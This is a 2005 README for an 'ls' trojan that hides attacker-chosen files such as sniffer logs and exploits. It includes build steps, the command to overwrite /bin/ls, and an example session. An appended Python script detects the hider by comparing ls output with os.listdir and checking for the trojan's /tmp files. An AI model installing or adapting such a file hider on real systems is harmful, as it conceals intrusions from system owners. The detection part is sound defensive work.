-=[ e1e-e5e - ls Trojan [file hider]
-=[ nitrous@danitrous.org
-=[ http://www.danitrous.org
-=[ 30/Jun/2005
-=[ Mexico

-=[ INTRODUCTION

e1e-e5e is a utility to hide files. How? First of all, it copies ./HIDDENFILES to /tmp/ls.HIDDENFILES and /bin/ls to /tmp/ls.bkp. After that, our ./ls reads each line from /tmp/ls.HIDDENFILES and compares it with each filename in the current directory. If a name is equal to any line from ls.HIDDENFILES, this fake ls binary doesn't show that filename. Before compilation, you need to edit HIDDENFILES, where you insert the names to hide: trojan filenames, sniffer logs, exploits, and so on. Try it, enjoy it!

-=[ FEATURES

Supported options (and some combinations):

$ls -l
$ls -a
$ls -la
$ls -l -a
$ls -a -l

(These only list the files of the current directory.) If any other switch is passed to the program, it does:

execve(/tmp/ls.bkp, argv, NULL);

-=[ COMPILATION AND INSTALLATION NOTES

To compile the fake 'ls', type:

$./builder.sh
$./ls        (try the compiled ./ls ;) )

After that, you can install the ./ls [trojan] by typing:

#install -m 755 ./ls /bin/ls

IMPORTANT NOTE !!!: If you replace /bin/ls with the ./ls trojan, your system is going to SUCK !! and the trojan too. Why? Because you need to append 'export LS_OPTIONS=""' to each /home/user/.bashrc, but on the next reboot the OS will be STUPID !. Well, it happens (hrm, my system does [ubuntu]). If you want to try, TRY IT ! and send me an e-mail with your results ;).

To uninstall (the first step is optional, only if you removed the original /bin/ls [overwrote it with the ./ls trojan]):

(#mv /tmp/ls.bkp /bin/ls)
$rm /tmp/ls.bkp
$rm /tmp/ls.HIDDENFILES

This leaves the original 'ls' in the correct place ;) and removes the other (unused) files...
-=[ EXAMPLE

nitrous@blackb0x:~ $ ls -l                        [THIS IS THE ORIGINAL /bin/ls]
total 426
drwxr-xr-x  2 nitrous nitrous   4096 2005-05-19 09:37 Desktop
drwxr-xr-x 30 nitrous nitrous   4096 2005-07-01 06:51 SOFTWARE
-rwxr--r--  1 nitrous nitrous 394375 2005-05-19 09:42 VSI_Wallpaper_Edition.jpg
drwxr-xr-x  8 nitrous nitrous   4096 2005-06-26 06:54 c0de
drwxr-xr-x 12 nitrous nitrous   4096 2005-06-29 04:16 exploits
drwxr-xr-x  7 nitrous nitrous   4096 2005-05-26 10:10 java
dr-xr-xr-x 34 root    root      8192 2005-06-27 11:43 misd0x
-rwxr-xr-x  4 nitrous nitrous     96 2005-06-30 11:19 nitrousc0de.txt
drwxr-xr-x 13 nitrous nitrous   4096 2005-07-01 05:36 research
nitrous@blackb0x:~ $ echo "exploits" >> /tmp/ls.HIDDENFILES
nitrous@blackb0x:~ $ echo "nitrousc0de.txt" >> /tmp/ls.HIDDENFILES
nitrous@blackb0x:~ $ research/e1e-e5e/ls -l       [THIS IS MY LS (trojan)]
total 422
drwxr-xr-x  2 nitrous nitrous   4096 2005-05-19 09:37 Desktop
drwxr-xr-x 30 nitrous nitrous   4096 2005-07-01 06:51 SOFTWARE
-rwxr--r--  1 nitrous nitrous 394375 2005-05-19 09:42 VSI_Wallpaper_Edition.jpg
drwxr-xr-x  8 nitrous nitrous   4096 2005-06-26 06:54 c0de
drwxr-xr-x  7 nitrous nitrous   4096 2005-05-26 10:10 java
dr-xr-xr-x 34 root    root      8192 2005-06-27 11:43 misd0x
drwxr-xr-x 13 nitrous nitrous   4096 2005-07-01 05:36 research
nitrous@blackb0x:~ $

As you can see, my ./ls hides all files listed in /tmp/ls.HIDDENFILES; in this case /tmp/ls.HIDDENFILES contains the strings 'exploits' and 'nitrousc0de.txt', so... it doesn't show these files ;). Easy?

-=[ FILES

/bin/ls               The trojan
/tmp/ls.bkp           The real ls (backup)
/tmp/ls.HIDDENFILES   List of files to hide

-=[ BUGS

When you type something like:

$ls
$ls -a

Heh, the fuckin' tabs and spaces between filenames come out wrong. Sorry, I'm lazy and bored =(.

-=[ FINAL WORDS

Sorry for my bad English skillz, but I need to practice. Greets to Vulnfact Security Crew (www.vulnfact.com), CUM(shot) ppl, friends ...blah blah. Oh and a delicious cherry called JSS ;)...
NOTE: The files 'filemode.c' and 'filemode.h' are from GNU/fileutils-4.1. I included these files because they contain the mode_string() routine, which converts a file mode in octal notation into a string. Nice, uh? =).
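The mechanism described in the INTRODUCTION (names filtered out of ls output, directory entries left untouched) is exactly what a cross-view check catches: compare what ls prints with an independent read of the same directory. Here is such a check in Python, added as an example; it is not part of e1e-e5e or its author's code. It parses the two listings from the EXAMPLE session above and reports which names the trojaned ls dropped, runs the same comparison live against the system ls with os.listdir as the independent view (a direct getdents read that never goes through the ls binary), and looks for the backup and list files named in the FILES section. The names alpha.txt, .beta and "gamma dir" used for the live run are constructed for the demo.

```python
"""Cross-view detection of an ls-filtering file hider (added example)."""
import os
import re
import subprocess
import tempfile
from typing import Iterable, Set

# On-disk artifacts the README's FILES section says the trojan leaves behind.
TROJAN_ARTIFACTS = ("/tmp/ls.bkp", "/tmp/ls.HIDDENFILES")

# One `ls -l` line: mode, links, owner, group, size, date/time, name.
# Accepts the ISO timestamp of the README session and the C-locale
# "Jun 30 11:19" / "Jun 30  2005" forms printed by a stock ls.
_LONG_LINE = re.compile(
    r"^[-dlcbps][rwxsStT-]{9}[.+@]?\s+"                     # mode (+ optional ACL/xattr mark)
    r"\d+\s+\S+\s+\S+\s+\d+\s+"                             # links, owner, group, size
    r"(?:\d{4}-\d{2}-\d{2}\s+\d{2}:\d{2}"                   # ISO date and time
    r"|\S+\s+\d{1,2}\s+(?:\d{2}:\d{2}|\d{4}))\s+"           # or month day time|year
    r"(.+)$"                                                # file name
)

# The two listings from the README's EXAMPLE session (real ls, then trojan).
REAL_LS_OUTPUT = """total 426
drwxr-xr-x  2 nitrous nitrous   4096 2005-05-19 09:37 Desktop
drwxr-xr-x 30 nitrous nitrous   4096 2005-07-01 06:51 SOFTWARE
-rwxr--r--  1 nitrous nitrous 394375 2005-05-19 09:42 VSI_Wallpaper_Edition.jpg
drwxr-xr-x  8 nitrous nitrous   4096 2005-06-26 06:54 c0de
drwxr-xr-x 12 nitrous nitrous   4096 2005-06-29 04:16 exploits
drwxr-xr-x  7 nitrous nitrous   4096 2005-05-26 10:10 java
dr-xr-xr-x 34 root    root      8192 2005-06-27 11:43 misd0x
-rwxr-xr-x  4 nitrous nitrous     96 2005-06-30 11:19 nitrousc0de.txt
drwxr-xr-x 13 nitrous nitrous   4096 2005-07-01 05:36 research
"""
TROJAN_LS_OUTPUT = """total 422
drwxr-xr-x  2 nitrous nitrous   4096 2005-05-19 09:37 Desktop
drwxr-xr-x 30 nitrous nitrous   4096 2005-07-01 06:51 SOFTWARE
-rwxr--r--  1 nitrous nitrous 394375 2005-05-19 09:42 VSI_Wallpaper_Edition.jpg
drwxr-xr-x  8 nitrous nitrous   4096 2005-06-26 06:54 c0de
drwxr-xr-x  7 nitrous nitrous   4096 2005-05-26 10:10 java
dr-xr-xr-x 34 root    root      8192 2005-06-27 11:43 misd0x
drwxr-xr-x 13 nitrous nitrous   4096 2005-07-01 05:36 research
"""


def names_from_ls_long(output: str) -> Set[str]:
    """Extract file names from `ls -l` / `ls -la` output, dropping '.' and '..'.

    Symlink lines carry 'name -> target'; only the name part is kept.
    """
    names = set()
    for line in output.splitlines():
        m = _LONG_LINE.match(line)
        if not m:                      # 'total N', blank, or unparseable line
            continue
        name = m.group(1)
        if line.startswith("l") and " -> " in name:
            name = name.split(" -> ", 1)[0]
        if name not in (".", ".."):
            names.add(name)
    return names


def hidden_names(ls_output: str, actual: Iterable[str]) -> Set[str]:
    """Names present in the independent view but absent from the ls listing."""
    shown = names_from_ls_long(ls_output)
    return {n for n in actual if n not in shown}


def check_directory(path: str, ls_binary: str = "ls") -> Set[str]:
    """Live cross-view: run `ls -la` (one of the switch combinations the
    trojan handles itself) in `path` and diff it against os.listdir, which
    reads the directory without involving the ls binary at all."""
    env = dict(os.environ, LC_ALL="C")   # fixed timestamp format for the parser
    out = subprocess.run([ls_binary, "-la"], cwd=path, env=env,
                         capture_output=True, text=True, check=True).stdout
    return hidden_names(out, os.listdir(path))


def present_artifacts() -> list:
    """Which of the trojan's documented files exist on this host."""
    return [p for p in TROJAN_ARTIFACTS if os.path.lexists(p)]


def demo_clean_dir() -> Set[str]:
    """Create a throw-away directory with constructed names, run the live
    check, and return whatever ls failed to show (empty on a clean system)."""
    with tempfile.TemporaryDirectory() as d:
        for name in ("alpha.txt", ".beta", "gamma dir"):
            open(os.path.join(d, name), "w").close()
        return check_directory(d)


if __name__ == "__main__":
    sample = hidden_names(TROJAN_LS_OUTPUT, names_from_ls_long(REAL_LS_OUTPUT))
    print("dropped from the README session:", sorted(sample))
    print("dropped in a fresh temp dir:", sorted(demo_clean_dir()))
    print("trojan artifacts present:", present_artifacts())
```

The listdir view is only independent of a user-space ls replacement; a kernel-level hider that filters getdents would fool both sides, which is why this kind of check is paired with a package-manager integrity check of /bin/ls (rpm -V or debsums on the coreutils package) and a look for the /tmp artifacts in practice.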